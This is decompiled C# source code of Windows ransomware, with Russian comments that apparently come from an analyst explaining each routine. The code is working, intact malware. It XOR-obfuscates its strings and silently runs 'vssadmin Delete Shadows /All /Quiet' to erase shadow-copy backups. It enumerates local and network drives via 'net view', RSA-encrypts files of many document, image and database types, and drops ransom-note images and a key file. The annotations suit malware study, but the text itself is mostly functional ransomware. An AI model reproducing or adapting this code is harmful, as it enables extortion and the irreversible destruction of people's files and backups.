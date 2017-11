namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 размер блока. private IContainer components = null; private List<string> extensions = new List<string>(); // список расширений private List<string> FullList = new List<string>(); // список шифруемых файлов private string keyCode; // Расширение зашифрованных файлов. Рандомное значение. private string keyfile = ""; // Хранит название файла "ssda.far" private string kfExt = ""; // расширение файла "far" private string kfName = ""; //имя без расширения "ssda" private static readonly int MAX_PATH = 260; // максимальный путь private string pbK = ""; // Публичный ключ для шифрования ключей которыми шифруют файлы. private string privateKey = ""; // Ключи которыми шифруют файлы приватный и публичный private string publicKey = ""; // Публичный ключ которым шифруются файлы. private int repeatCount = 3; // Количество строк шифрования private List<string> SpecFolders = new List<string>(); private string vNF = ""; // имя файла HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // Значение для расшифровки в функции DEXOR = 145 ////// сохранение картинки с требованиями выкупа из ресурсов HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// Шифрование файлов - основная процедура private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// Шифрование с помощью публичного ключа основных ключей для шифрования - ключевая функция private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// Удаляет теневые копии файлов private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// Расшифровка строк из массива байтов в строку с помощью XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// Основная функция стартующая всё. private void Init() { this.Prep(); // Инициализация this.SaveNotes(); // Сохранение картинки и файла ключей this.GetDrives(); // Получение дисков this.NetScan(); // Сканирование сети this.SetDesktopWallpaper(); // Должно видимо быть установка картинки в качестве обоев, но не работает } private void Prep() { int num5; // Строка a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Если Windows Vista и выше - то удаляет теневые копии. if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // расшифровка значений из массивов байтов в строки... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // вычисление расширения для шифрованных файлов Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // таким будет расширение файлов после шифрования... // Создание списка папок для исключения из шифрования... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* Исключеные папки... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// Создание списка расширений this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * Затрагиваемые расширения файлов: .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // получение сетевых путей List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex = index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '

' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("Диск") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf("Диск"))); } } } catch { } num5++; } /// Создание криптопровайдера для шифрования...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // Только публичный ключ в XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); //Публичный и приватный ключи в зашифрованном виде... } ///// Сохранение файла ключей для расшифровки в файл ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// Сохранение файлов картинки и файла ключей на рабочем столе и в папке пользователя private void SaveNotes() { List<string> list = new List<string> { // создаем список с папками Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // рабочий стол Environment.GetFolderPath(Environment.SpecialFolder.Personal) // папка юзера }; for (int i = 0; i < list.Count; i++) // в двух местах { this.SaveKey(list[i], this.privateKey); // сохраняем ключи в файл ssda.far this.AddNote(list[i]); // сохраняем картинку с требованием выкупа } } ///// получение директорий private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// Получение списка локальных и сетевых дисков private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// Получение файлов из папок и шифрование... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // выбор по расширению { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { this.CF(str3); /// шифрование файла... } } } } } catch { } } } }